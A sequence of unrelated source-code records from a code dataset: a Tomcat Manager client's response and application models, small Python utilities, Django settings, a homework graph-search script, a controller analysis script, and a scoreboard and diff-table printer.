tomcatmanager as tm\n >>> tomcat = getfixture('tomcat')\n >>> try:\n ... r = tomcat.server_info()\n ... r.raise_for_status()\n ... if r.ok:\n ... print(r.server_info.os_name)\n ... else:\n ... print('Error: {}'.format(r.status_message))\n ... 
except Exception as err:\n ... # handle exception\n ... pass\n Linux\n\n \"\"\"\n\n def __init__(self, response=None):\n self._response = response\n self._status_code = None\n self._status_message = None\n self._result = None\n\n @property\n def ok(self):\n \"\"\"\n :return: True if the request completed with no errors.\n\n For this property to return True:\n\n - The HTTP request must return a status code of ``200 OK``\n - The first line of the response from the Tomcat Server must begin with ``OK``.\n \"\"\"\n return all([\n self.response is not None,\n self.response.status_code == requests.codes.ok,\n self.status_code == tm.status_codes.ok,\n ])\n\n def raise_for_status(self):\n \"\"\"\n Raise exceptions for server errors.\n\n First this method calls ``requests.Response.raise_for_status()`` which\n raises exceptions if a 4xx or 5xx response is received from the server.\n\n If that doesn't raise anything, then it raises a :class:`.TomcatError`\n if there is not an ``OK`` response from the first line of text back\n from the Tomcat Manager web app.\n \"\"\"\n self.response.raise_for_status()\n if self.status_code != tm.status_codes.ok:\n raise TomcatError(self.status_message)\n\n @property\n def status_code(self):\n \"\"\"\n Status of the Tomcat Manager command from the first line of text.\n\n The preferred way to check for success is to use the\n :meth:`~.TomcatManagerResponse.ok` method, because it checks for http\n errors as well as tomcat errors. However, if you want specific access\n to the status of the tomcat command, use this method.\n\n There are three status codes:\n\n - ``OK``\n - ``FAIL``\n - ``NOTFOUND``\n\n ``tomcatmanager.status_codes`` is a dictionary which makes it\n easy to check this code against known values. It also has attributes\n with friendly names, as shown here::\n\n >>> import tomcatmanager as tm\n >>> tomcat = getfixture('tomcat')\n >>> r = tomcat.server_info()\n >>> r.status_code == tm.status_codes.ok\n True\n \"\"\"\n return self._status_code\n\n @status_code.setter\n def status_code(self, value: str):\n self._status_code = value\n\n @property\n def status_message(self):\n \"\"\"\n The message on the first line of the response from the Tomcat Server.\n \"\"\"\n return self._status_message\n\n @status_message.setter\n def status_message(self, value: str):\n self._status_message = value\n\n @property\n def result(self):\n \"\"\"\n The text of the response from the Tomcat server, without the first\n line (which contains the status code and message).\n \"\"\"\n return self._result\n\n @result.setter\n def result(self, value: str):\n self._result = value\n\n @property\n def response(self) -> requests.models.Response:\n \"\"\"\n The server's response to an HTTP request.\n\n :class:`.TomcatManager` uses the excellent Requests package for HTTP\n communication. This property returns the ``requests.models.Response``\n object which contains the server's response to the HTTP request.\n\n Of particular use is ``requests.models.Response.text`` which contains\n the content of the response in unicode. 
If you want raw access to the\n content returned by the Tomcat Server, this is where you can get it.\n \"\"\"\n return self._response\n\n @response.setter\n def response(self, response: requests.models.Response):\n self._response = response\n # parse the text to get the status code and results\n if response.text:\n lines = response.text.splitlines()\n # get the status line, if the request completed OK\n if response.status_code == requests.codes.ok:\n try:\n statusline = response.text.splitlines()[0]\n code = statusline.split(' ', 1)[0]\n if code in tm.status_codes.values():\n self.status_code = code\n self.status_message = statusline.split(' ', 1)[1][2:]\n if len(lines) > 1:\n self.result = \"\\n\".join(lines[1:])\n else:\n self.status_code = tm.status_codes.notfound\n self.status_message = 'Tomcat Manager not found'\n except IndexError:\n pass\n\n\nAPPLICATION_STATES = [\n 'running',\n 'stopped',\n]\napplication_states = AttrDict()\n\"\"\"docstring for application_states\"\"\"\nfor _state in APPLICATION_STATES:\n application_states[_state] = _state\n\nTA = TypeVar('TA', bound='TomcatApplication')\nclass TomcatApplication():\n \"\"\"\n Discrete data about an application running inside a Tomcat Server.\n\n A list of these objects is returned by :meth:`.TomcatManager.list`.\n \"\"\"\n @classmethod\n def sort_by_state_by_path_by_version(cls, app: TA):\n \"\"\"\n Function to create a key usable by ``sort`` to sort by state, by path, by version.\n \"\"\"\n return '{}:{}:{}'.format(\n app.state or '',\n app.path or '',\n app.version or ''\n )\n\n @classmethod\n def sort_by_path_by_version_by_state(cls, app: TA):\n \"\"\"\n Function to create a key usable by ``sort`` to sort by path, by version, by state\n \"\"\"\n return '{}:{}:{}'.format(\n app.path or '',\n app.version or '',\n app.state or ''\n )\n\n def __init__(self):\n self._path = None\n self._state = None\n self._sessions = None\n self._directory = None\n self._version = None\n\n def __str__(self):\n \"\"\"Format this application as it comes from the tomcat server.\"\"\"\n fmt = \"{}:{}:{}:{}\"\n sessions = ''\n if self.sessions is not None:\n sessions = self.sessions\n return fmt.format(\n self.path or '',\n self.state or '',\n sessions,\n self.directory_and_version or ''\n )\n\n def __lt__(self, other: TA):\n \"\"\"\n Compare one object to another. Useful for sorting lists of apps.\n\n The sort order is by state (as string), by path (as string), by version\n (by string, if present).\n \"\"\"\n self_key = self.sort_by_state_by_path_by_version(self)\n other_key = self.sort_by_state_by_path_by_version(other)\n return self_key < other_key\n\n def parse(self, line: str):\n \"\"\"\n Parse a line from the server into this object.\n\n :param: line - the line of text from Tomcat Manager describing\n a deployed application\n\n Tomcat Manager outputs a line like this for each application:\n\n .. code-block:: none\n\n /shiny:running:0:shiny##v2.0.6\n\n The data elements in this line can be described as:\n\n .. 
code-block:: none\n\n {path}:{state}:{sessions}:{directory}##{version}\n\n Where version and the two hash marks that precede it are optional.\n \"\"\"\n app_details = line.rstrip().split(\":\")\n self._path, self._state, sessions, dirver = app_details[:4]\n self._sessions = int(sessions)\n dirver = dirver.split('##')\n self._directory = dirver[0]\n if len(dirver) == 1:\n self._version = None\n else:\n self._version = dirver[1]\n\n @property\n def path(self):\n \"\"\"\n The context path, or relative URL, where this app is available on the server.\n \"\"\"\n return self._path\n\n @property\n def state(self):\n \"\"\"\n The current state of the application.\n\n ``tomcatmanager.application_states`` is a dictionary of all the valid\n values for this property. In addition to being a dictionary, it also has\n attributes for each possible state::\n\n >>> import tomcatmanager as tm\n >>> tm.application_states['stopped']\n 'stopped'\n >>> tm.application_states.running\n 'running'\n \"\"\"\n return self._state\n\n @property\n def sessions(self):\n \"\"\"\n The number of currently active sessions.\n \"\"\"\n return self._sessions\n\n @property\n def directory(self):\n \"\"\"\n The directory on the server where this application resides.\n \"\"\"\n return self._directory\n\n @property\n def version(self):\n \"\"\"\n The version of the application given when it was deployed.\n\n If deployed without a version, this property returns None.\n \"\"\"\n return self._version\n\n @property\n def directory_and_version(self):\n \"\"\"\n Combine directory and version together.\n\n Tomcat provides this information as ``{directory}`` if there was no\n version specified when the application was deployed, or\n ``{directory}##{version}`` if the version was specified.\n\n This method has the logic to determine if version was specified or not.\n \"\"\"\n dandv = None\n if self.directory:\n dandv = self.directory\n if self.version:\n dandv += '##{}'.format(self.version)\n return dandv\n\n\nclass ServerInfo(dict):\n \"\"\"\n Discrete data about the Tomcat server.\n\n This object is a dictionary of keys and values as returned from the\n Tomcat server. 
It also has properties for well-known values.\n\n Usage::\n\n >>> tomcat = getfixture('tomcat')\n >>> r = tomcat.server_info()\n >>> r.server_info['OS Architecture'] # doctest: +ELLIPSIS\n '...'\n >>> r.server_info.jvm_vendor # doctest: +ELLIPSIS\n '...'\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"\n Initialize from the plain text response from a Tomcat server.\n\n :param result: the plain text from the server, minus the first\n line with the status info\n \"\"\"\n super().__init__(*args, **kwargs)\n self._tomcat_version = None\n self._os_name = None\n self._os_version = None\n self._os_architecture = None\n self._jvm_version = None\n self._jvm_vendor = None\n result = kwargs.pop('result', None)\n self._parse(result)\n\n def _parse(self, result: str):\n \"\"\"Parse up a list of lines from the server.\"\"\"\n if result:\n for line in result.splitlines():\n key, value = line.rstrip().split(':', 1)\n self[key] = value.lstrip()\n\n self._tomcat_version = self['Tomcat Version']\n self._os_name = self['OS Name']\n self._os_version = self['OS Version']\n self._os_architecture = self['OS Architecture']\n self._jvm_version = self['JVM Version']\n self._jvm_vendor = self['JVM Vendor']\n\n @property\n def tomcat_version(self):\n \"\"\"The tomcat version string.\"\"\"\n return self._tomcat_version\n\n @property\n def os_name(self):\n \"\"\"The operating system name.\"\"\"\n return self._os_name\n\n @property\n def os_version(self):\n \"\"\"The operating system version.\"\"\"\n return self._os_version\n\n @property\n def os_architecture(self):\n \"\"\"The operating system architecture.\"\"\"\n return self._os_architecture\n\n @property\n def jvm_version(self):\n \"\"\"The java virtual machine version string.\"\"\"\n return self._jvm_version\n\n @property\n def jvm_vendor(self):\n \"\"\"The java virtual machine vendor.\"\"\"\n return self._jvm_vendor\n","sub_path":"src/tomcatmanager/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":14267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"501497208","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def isCompleteTree(self, root: Optional[TreeNode]) -> bool:\n queue = deque([root])\n hasNull = 0\n while queue:\n node = queue.popleft()\n if not node:\n hasNull = 1\n continue\n if hasNull:\n return False\n queue.append(node.left)\n queue.append(node.right)\n\n return True\n","sub_path":"src/tree/958.py","file_name":"958.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"615785509","text":"'''\nConverts python dictionaries that are stored in\npickle files into hickle files for speed improvement.\n'''\n\nimport hickle, pickle\nimport argparse\n\n\ndef _run():\n args = _get_args()\n print('load pickle file...')\n info_dict = _load_data_pickle(args.input_file)\n print('done.\\ndump hickle file...')\n with open(args.input_file.replace('.pkl','.hkl'), 'w') as f:\n hickle.dump(info_dict, f)\n print('conversion done')\n\n\ndef _load_data_pickle(file_name):\n try:\n with open(file_name, \"rb\") as pkl_file:\n data = pickle.load(pkl_file)\n pkl_file.close()\n return data\n except IOError as e:\n print(\"({})\".format(e))\n\n\ndef _get_args():\n help_input_file = \"Pickle metadata input file\"\n parser = 
argparse.ArgumentParser(description=__doc__)\n parser.add_argument('input_file',\n help=help_input_file)\n parser.add_argument('-v', '--verbose', action='store_true',\n help='increase output verbosity')\n args = parser.parse_args()\n if args.verbose:\n print('Will convert the following:\\n Input pickle file: {}\\n'.format(args.input_file))\n return args\n\n\nif __name__ == \"__main__\":\n _run()\n","sub_path":"converter/PickleToHickle.py","file_name":"PickleToHickle.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"642174247","text":"import argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-e','--eval',dest = 'eval',default = 0.01,type=float,help = 'evalue cutoff, optional (default: 1)', required = False)\nparser.add_argument('-i','--in',dest = 'in_', help = 'input file name, required')\nparser.add_argument('-o','--out',dest = 'out_', default = 'output.txt', help = 'output file name, optional (default: output.txt)', required = False)\n\nargs = parser.parse_args()\nevalue_cut = args.eval\nin_file_name = args.in_\nout_file_name = args.out_\n\ninput_file = open(in_file_name)\noutput_file = open(out_file_name, \"w\")\ngene_list = []\n\n\ndef dict_making (gene_list): \n\n\tdict_ = {}\n\tfor line in input_file:\n\t\t\n\t\tline_= line.split()\n\t\tgene_list.append(line_[0]) #??\n\t\t\n\t\tif line_[0] not in dict_:\n\t\t\tdict_[line_[0]] = []\n\n\t\tif line_[0] in dict_:\n\t\t\tdict_[line_[0]].append( (line_[1], line_[10]) )\n\n\treturn dict_\n\ndef searching (dict_,gene_list):\n\t\n\tcounting = 0\n\tok = 0\n\tsingle = [] \n\tmulti = [] \n\tgene_list2 = set(gene_list)\n\n\tfor key, value in dict_.items():\n\n\t\tif len(value) == 1:\n\t\t\tif key == value[0][0]:\n\t\t\t\tsingle.append(key)\n\n\t\telse:\t\n\t\t\tfor i in range(len(value)):\n\t\t\t\tif value[i][0] not in gene_list2:\n\t\t\t\t\tif ok == 0:\n\t\t\t\t\t\tmini = value[i][1]\n\t\t\t\t\t\tmini_id = value[i][0]\n\t\t\t\t\tok += 1\n\n\t\t\t\t\tif float(value[i][1]) >= evalue_cut:\n\t\t\t\t\t\tcounting += 1\n\n\t\t\t\t\t\tif value[i][1] < mini:\n\t\t\t\t\t\t\tmini = value[i][1]\n\t\t\t\t\t\t\tmini_id = value[i][0]\n\t\t\tif ok != 0:\n\t\t\t\tif counting == ok:\n\t\t\t\t\tmulti.append((key,len(value),mini_id,mini))\n\t\t\tcounting = 0\n\t\t\tok = 0\n\t\t\t\n\tfor i in range(len(single)):\n\t\toutput_file.write(single[i] + '\\t0\\n')\n\n\tfor i in range(len(multi)):\n\t\toutput_file.write(multi[i][0] + '\\t' + str(multi[i][1]) + '\\t' + multi[i][2] + '\\t' + str(multi[i][3]) + '\\n')\n\n\n\ndict_ = dict_making(gene_list) \nsearching(dict_,gene_list)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"2360676","text":"from os import path\nfrom random import seed, choice\nfrom time import time\nimport json\n\nDATA_PY = path.abspath(path.dirname(__file__))\nDATA_DIR = path.normpath(path.join(DATA_PY, '..', 'data'))\n\ndef read_data(type, name):\n file = open(path.join(DATA_DIR, type, name + \".dat\")).read()\n data = json.JSONDecoder().decode(file)\n return data\n\nclass Die(object):\n def __init__(self, sides=6):\n try:\n self.sides = range(1, sides)\n except TypeError:\n self.sides = list(sides)\n\n def roll(self, times=1):\n t = time()\n seed(t)\n total = 0\n for i in range(1, times + 1):\n roll = choice(self.sides)\n total += roll\n return 
total\n","sub_path":"src/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"474085721","text":"\"\"\"Setting for development environment\"\"\"\n\nfrom .base import *\n\nDEBUG = True\n\n# Bend the Django cache to use the redis container\nCACHES[\"default\"][\"LOCATION\"] = \"redis://cathapi-redis:6379/1\"\n\n# Bend the broker to the redis container\nBROKER_URL = 'redis://cathapi-redis:6379'\nCELERY_RESULT_BACKEND = 'redis://cathapi-redis:6379'\n\n# These settings make sure any tasks run in testing \n# are run locally with the 'test' database\nCELERY_ALWAYS_EAGER = True\nTEST_RUNNER = 'djcelery.contrib.test_runner.CeleryTestSuiteRunner'\n\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join('/cathapi-data', 'db.sqlite3'),\n }\n}\n\nINSTALLED_APPS += [\n # 'debug_toolbar',\n]\n\nSTATICFILES_DIRS = [\n os.path.join('static/'),\n]\n\nSTATIC_ROOT = '/static'\n\n#MIDDLEWARE += ['debug_toolbar.middleware.DebugToolbarMiddleware', ]\n","sub_path":"cathapi/cathapi/settings/container.py","file_name":"container.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"3536106","text":"\"\"\"\n\nThis program will answer part one of hw5 for scripting\n\n1) A function to create a random graph. This function will take a single parameter for the number\nof nodes in the graph, and will return a NetworkX undirected graph object.\n\n2) A function that implements a depth-first search of a graph. This function will take two\nparameters: a NetworkX graph object and the node at which to start the search. It will return a\nlist of node names in the order they were visited. (Hint: use a stack to implement this algorithm)\n\n3) A function that implements a breadth-first search of a graph. This function will take two\nparameters: a NetworkX graph object and the node at which to start the search. It will return a\nlist of node names in the order they were visited. 
(Hint: use a queue to implement this\nalgorithm)\n\n\"\"\"\n\n## import statements\nimport sys\nimport networkx as nx\nimport matplotlib.pyplot as plt\nimport random\n\n## function / class definitions\ndef random_graph(nnodes, connect):\n DG = nx.DiGraph()\n\n nodes = range(nnodes)\n\n DG.add_nodes_from(nodes)\n\n links = []\n\n random.seed(15)\n\n for i in nodes: ## modify to remove double connections?\n for j in nodes:\n roll = random.randint(0, connect)\n\n if roll == 0:\n links.append((i, j))\n\n DG.add_edges_from(links)\n\n nx.draw_random(DG) ## ************\n plt.draw()\n #plt.show()\n\n namenodes = {}\n\n for item in nodes:\n namenodes[item] = {'node number' : str(item)}\n\n nx.set_node_attributes(DG, namenodes)\n #nodenames = nx.get_node_attributes(DG, 'node number')\n\n return DG\n\n\n\ndef depth_search(graph, start):\n\n all = {} ## dictionary of new adjacent nodes from each node\n ## key is node number and value is list of adjacent (unvisited) node numbers\n\n tier = 0\n pick = 0 ## depth first -- grab first list element for all, then second, etc.\n nodenum = start ## start at node 0 -- this is fed in as function argument\n\n def all_append(dict, level, ind, id, graph_id, check):\n dict[(level, ind)] = (id, [x for x in nx.all_neighbors(graph_id, id) if x not in check])\n ## dict is all, level is tier, ind is pick / num in list, id is nodenum, graph_id is graph, check is covered\n\n tierset = tier\n nodenumset = nodenum\n covered = [] ## nodes that have been searched\n ## using covered in this way will ignore connections to nodes that have already been searched\n\n all_append(all, tier, pick, nodenum, graph, covered)\n\n\n covered.append(nodenum)\n\n print(all)\n\n a = True #########\n while a == True:\n\n while all[tier, pick] != []:\n neighbors = all[tier, pick]\n nodenum = neighbors[pick]\n tier += 1\n covered.append(nodenum)\n\n all_append(all, tier, pick, nodenum, graph, covered)\n\n print(all)\n #print(\"cycle\") ###########\n\n break\n\n tier -= 1\n pick += 1\n\n\n\n ## I need to rethink this -- don't want to have to specify node in dict key\n ## should be tuple of (tier, pick)\n ## nodenum will be stored in value\n ## so value will be tuple (nodenum, list_of_adjacents)\n\n\n\n \n\n\n\n ## run this for loop again and again -- will need to put it into larger loop\n ## that should do it\n\n\n\n\n \"\"\"\n possibly use recursion -- wrap this process of going one level deeper if there is another level into\n its own function, then run that function within a loop? 
\n \n \"\"\"\n\n ## throw this in a while loop ^ & iterate thru tiers and nodes in each tier\n\n ## this structure should work for 2 and 3 -- just will move thru it in a different order\n\n print(all)\n print(covered) ## also need to show order in which nodes were visited -- this is 'covered'\n\ndef breadth_search(graph, start):\n all = {} ## dictionary of new adjacent nodes from each node\n ## key is node number and value is list of adjacent (unvisited) node numbers\n\n tier = 0\n nodenum = start ## start at node 0 -- this is fed in as function argument\n\n def all_append(dict, level, id, graph_id, check):\n dict[(level, id)] = [x for x in nx.all_neighbors(graph_id, id) if x not in check]\n ## dict is all, level is tier, id is nodenum, graph_id is graph, check is covered\n\n tierset = tier\n nodenumset = nodenum\n covered = [] ## nodes that have been searched\n ## using covered in this way will ignore connections to nodes that have already been searched\n\n all_append(all, tier, nodenum, graph, covered)\n\n covered.append(nodenum)\n\n tier += 1\n for adjacent in all[(tierset, nodenumset)]:\n nodenum = adjacent\n covered.append(nodenum)\n\n all_append(all, tier, nodenum, graph, covered)\n\n ## run this for loop again and again -- will need to put it into larger loop\n ## that should do it\n\n \"\"\"\n possibly use recursion -- wrap this process of going one level deeper if there is another level into\n its own function, then run that function within a loop? \n\n \"\"\"\n\n ## throw this in a while loop ^ & iterate thru tiers and nodes in each tier\n\n ## this structure should work for 2 and 3 -- just will move thru it in a different order\n\n print(all)\n print(covered) ## also need to show order in which nodes were visited -- this is 'covered'\n\n## main function definition\ndef main():\n graph = random_graph(10, 4)\n #plt.show() ## ***********\n\n depth_search(graph, 0)\n\n\n## run main function\nif __name__ == \"__main__\":\n main()","sub_path":"hw5/hw5_1.9.py","file_name":"hw5_1.9.py","file_ext":"py","file_size_in_byte":5530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"291959685","text":"from PIL import Image, ImageDraw\ndef gradient(choose):\n new_image = Image.new(\"RGB\", (512, 200), (0, 0, 0))\n draw = ImageDraw.Draw(new_image)\n r = 0\n g = 0\n b = 0\n for i in range(new_image.size[0]):\n draw.line((i, 0, i, 512), fill=(r, g, b), width=2)\n if i % 4 == 0:\n if choose == \"R\":\n r += 2\n elif choose == \"G\":\n g += 2\n else:\n b += 2\n new_image.save(\"res.png\", \"PNG\")\ngradient('R')","sub_path":"python/lab3_python/26.1.py","file_name":"26.1.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"372335182","text":"\"\"\" A program for analyzing multiple controllers for force control.\n\"\"\"\nimport SLSsyn as Ss\nimport control as co\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport Jan09_plant_pool as mo\nfrom collections import OrderedDict\n\n\nif __name__ == '__main__':\n Ts = 0.008\n s = co.tf([1, 0], [1])\n\n # plants definition:\n # - Link stiffness is identified to be 60 N/mm. To be clear, this stiffness level is\n # not from the link only, it has effect from the foam table surface as well.\n # - The softest environment is created from those foam sheets. Stiffness level 3.8 N/mm\n # - The stiffest environment are the blocks. Their stiffnesses can be up to 200 N/mm. 
Because\n # of this omega_add is assign -30 to check for stability.\n plants = OrderedDict([\n ('nominal', mo.PlantV2.plant(K_env=3.8, omega_add=-30, K_env_aug=40)),\n # ('freespace', mo.PlantV2.plant(K_env=10e-3)),\n # ('stiff', mo.PlantV2.plant(K_env=20, K_env_aug=10)),\n ('stiffer', mo.PlantV2.plant(K_env=40, K_env_aug=10)),\n ('stiffest', mo.PlantV2.plant(K_env=60, K_env_aug=10)),\n ('stiffest2', mo.PlantV2.plant(K_env=80, K_env_aug=10))\n ])\n\n # controller descriptions:\n # c0 = mo.Controllers.PI_v1(0, 8e-1)\n c0 = mo.Controllers.Qsyn(filename=\"Jan09_controller_statespace_general_configuration.npz\")\n\n # analysis mode, nothing special, just step output and Nyquist to check the condition of robust stability.\n omega_interested = [1, 5, 10, 20, 40, 80, 100, 200]\n analysis_dict = {\n 'row_col': (3, 2),\n 'freqs': np.logspace(-3, 2.56, 500),\n 'recipe': [\n (0, 0, \"step\", (0, 0)),\n (0, 0, \"step\", (0, 1)),\n (0, 1, \"step\", (1, 0)),\n (1, 0, \"nyquist\", (3, 3), omega_interested),\n (1, 1, \"bode_mag\", (1, 0), omega_interested),\n (2, 1, \"bode_mag\", (0, 0), omega_interested),\n (2, 0, \"bode_mag\", (2, 0), omega_interested),\n ]\n }\n for plant_key in plants:\n Ss.analysis(plants[plant_key], c0, analysis_dict,\n input_descriptions=mo.PlantV2.input_descriptions,\n output_descriptions=mo.PlantV2.output_descriptions,\n controller_name=plant_key, nb_sim_steps=500)\n","sub_path":"infinite_interaction/SLS-scripts/Jan09_controllers_analysis.py","file_name":"Jan09_controllers_analysis.py","file_ext":"py","file_size_in_byte":2275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"262704752","text":"class Scoreboard(object):\r\n class Entry(object):\r\n def __init__(self, name, score):\r\n self.name = name\r\n self.score = score\r\n self.nextEntry = None\r\n \r\n @property\r\n def name(self):\r\n return self.__name\r\n\r\n @property\r\n def score(self):\r\n return self.__score\r\n\r\n @property\r\n def nextEntry(self):\r\n return self.__nextEntry\r\n\r\n @name.setter\r\n def name(self, nameIn):\r\n if not isinstance(nameIn, str):\r\n raise RuntimeError(nameIn + 'is not a valid name for score entry')\r\n self.__name = nameIn\r\n \r\n @score.setter\r\n def score(self, scoreIn):\r\n if not isinstance(scoreIn, int):\r\n raise RuntimeError(scoreIn + 'is not a valid score for score entry')\r\n self.__score = scoreIn\r\n\r\n @nextEntry.setter\r\n def nextEntry(self, entryIn):\r\n if not (isinstance(entryIn, self.__class__) or entryIn == None):\r\n raise RuntimeError(entryIn + 'is not a valid assignment for nextEntry')\r\n self.__nextEntry = entryIn\r\n\r\n def __str__(self):\r\n return self.name + ' | ' + str(self.score)\r\n \r\n def __init__(self):\r\n self.head = None\r\n self.tail = None\r\n self.readFromFile('resources/event_scrolls/highscores.asset')\r\n\r\n @property\r\n def head(self):\r\n return self.__head\r\n\r\n @property\r\n def tail(self):\r\n return self.__tail\r\n\r\n @head.setter\r\n def head(self, value):\r\n if not isinstance(value, Scoreboard.Entry) and value != None:\r\n raise RuntimeError(value + 'is not a valid head entry.')\r\n self.__head = value\r\n\r\n @tail.setter\r\n def tail(self, value):\r\n if not isinstance(value, Scoreboard.Entry) and value != None:\r\n raise RuntimeError(value + 'is not a valid head entry.')\r\n self.__tail = value\r\n\r\n def add(self, name, score):\r\n entry = self.Entry(name, score)\r\n if self.head == None:\r\n self.head = entry\r\n self.tail = entry\r\n\r\n if self.head.score < 
entry.score:\r\n entry.nextEntry = self.head\r\n self.head = entry\r\n else:\r\n currEntry = self.head\r\n while currEntry.nextEntry != None and currEntry.nextEntry.score >= entry.score:\r\n currEntry = currEntry.nextEntry\r\n entry.nextEntry = currEntry.nextEntry\r\n currEntry.nextEntry = entry\r\n self.__trim()\r\n\r\n def resetList(self):\r\n self.head = None\r\n self.tail = None\r\n\r\n def belongsOnList(self, score):\r\n return score > self.tail.score\r\n\r\n def writeToFile(self, filename):\r\n fileName = open(filename, 'w')\r\n currEntry = self.head\r\n while currEntry.nextEntry:\r\n if currEntry.nextEntry.nextEntry != None:\r\n fileName.write(currEntry.name+'.'+str(currEntry.score)+',')\r\n else:\r\n fileName.write(currEntry.name+'.'+str(currEntry.score))\r\n currEntry = currEntry.nextEntry\r\n fileName.close()\r\n\r\n def readFromFile(self, fileName):\r\n with open(fileName) as f:\r\n read_data = f.read().split(',')\r\n for entry in read_data:\r\n temp = entry.split('.')\r\n self.add(temp[0],int(temp[1]))\r\n\r\n\r\n def __trim(self):\r\n currEntry = self.head\r\n i = 0\r\n while currEntry.nextEntry != None and i < 20:\r\n currEntry = currEntry.nextEntry\r\n i += 1\r\n self.tail = currEntry\r\n self.tail.nextEntry = None \r\n\r\n def __str__(self):\r\n result = '***HALL OF FAME!***\\n'\r\n currEntry = self.head\r\n i = 1\r\n #result += str(i) + ') ' + str(currEntry) + '\\n'\r\n #i += 1\r\n while currEntry.nextEntry:\r\n result += str(i) + ') ' + str(currEntry) + '\\n'\r\n i += 1\r\n currEntry = currEntry.nextEntry\r\n result += str(i) + ') ' + str(currEntry) + '\\n'\r\n return result\r\n\r\n\r\n \r\n","sub_path":"highscore.py","file_name":"highscore.py","file_ext":"py","file_size_in_byte":4122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"485521131","text":"from termcolor import colored as clr, cprint\nfrom itertools import zip_longest\nimport os\n\n\nclass Table:\n try:\n columns, rows = os.get_terminal_size()\n columns -= 15\n except:\n columns = 100\n box_weight = columns // 2\n\n table_color = 'white'\n keyword = 'yellow'\n accepted = 'green'\n wrong = 'red'\n information = 'white'\n\n dif_sign = clr('|', table_color, attrs=['bold'])\n\n @staticmethod\n def multiple(n, value=' '):\n s = value * n\n return s\n\n def separator(self, value='-'):\n cprint(self.multiple(self.box_weight * 2 + 5 + 8, clr(value, self.table_color, attrs=['bold'])),\n self.table_color)\n\n def header(self, col1, col2):\n\n self.separator()\n\n print(self.dif_sign + clr(' LN ', self.keyword) + self.dif_sign, end='')\n\n before = (self.box_weight - len(col1)) / 2\n before = int(before)\n after = self.box_weight - before - len(col1)\n\n print(self.multiple(before, ' ') + clr(col1, self.keyword) + self.multiple(after, ' '), end='')\n print(self.dif_sign, end='')\n\n print(clr(' LN ', self.keyword) + self.dif_sign, end='')\n\n before = (self.box_weight - len(col2)) / 2\n before = int(before)\n after = self.box_weight - before - len(col2)\n\n print(self.multiple(before) + clr(col2, self.keyword) + self.multiple(after), end='')\n print(self.dif_sign, end='')\n\n print()\n\n self.separator()\n\n @staticmethod\n def value_rectifier(s, strip_ok=False):\n s = s.replace('\\r', '')\n if strip_ok:\n s = s.strip()\n return s\n\n def line_print(self, no, x, y):\n\n pt = []\n x = self.value_rectifier(x)\n y = self.value_rectifier(y)\n\n for o, e in zip_longest(x, y, fillvalue=''):\n if o == e:\n pt.append(clr(o, self.accepted))\n else:\n pt.append(clr(o, 
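# The `add` method in the Scoreboard above has a subtle bug: when the list is
# empty it assigns head/tail and then still falls through to the insertion
# logic, which links the new entry to itself (an early return after the
# empty-list branch would avoid that). A hedged sketch of a safer ordered
# insert, using plain tuples instead of the Entry class so it runs stand-alone:
def insert_sorted(entries, name, score, max_len=20):
    """Insert (name, score) into a list kept sorted by descending score."""
    i = 0
    while i < len(entries) and entries[i][1] >= score:
        i += 1
    entries.insert(i, (name, score))
    del entries[max_len:]          # keep at most max_len entries, like __trim
    return entries


board = []
for n, sc in [("ana", 10), ("bo", 30), ("cy", 20)]:
    insert_sorted(board, n, sc)
print(board)   # [('bo', 30), ('cy', 20), ('ana', 10)]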
self.wrong))\n\n sx = len(x)\n sy = len(y)\n curr = 0\n\n x_null = False\n y_null = False\n\n if x == '(#$null$#)':\n x_null = True\n\n if y == '(#$null$#)':\n y_null = True\n\n s_max = max(sx, sy)\n line_col = 'cyan'\n\n if x != y:\n line_col = 'red'\n\n while curr <= s_max:\n\n print(self.dif_sign + ' ' + clr(no, line_col) + ' ' * (3 - len(no)) + self.dif_sign, end='')\n tx = ''\n if x_null:\n tx = clr('(null)', self.information) + ' ' * (self.box_weight - 6)\n else:\n for i in range(curr, curr + self.box_weight):\n if i < sx:\n tx += pt[i]\n else:\n tx += ' ' * (self.box_weight - (i - curr))\n break\n\n print(tx + self.dif_sign, end='')\n\n print(' ' + clr(no, 'cyan') + ' ' * (3 - len(no)) + self.dif_sign, end='')\n tx = ''\n if y_null:\n tx = clr('(null)', self.information) + ' ' * (self.box_weight - 6)\n else:\n for i in range(curr, curr + self.box_weight):\n if i < sy:\n tx += clr(y[i], self.accepted)\n else:\n tx += ' ' * (self.box_weight - (i - curr))\n break\n\n print(tx + self.dif_sign)\n\n curr += self.box_weight\n no = ''\n\n def print(self, output, expected, col1='Output', col2='Expected'):\n\n self.header(col1, col2)\n\n x_empty = False\n y_empty = False\n\n vx, vy = '', ''\n\n if output == '':\n x_empty = True\n\n if expected == '':\n y_empty = True\n x = output.split(sep='\\n')\n y = 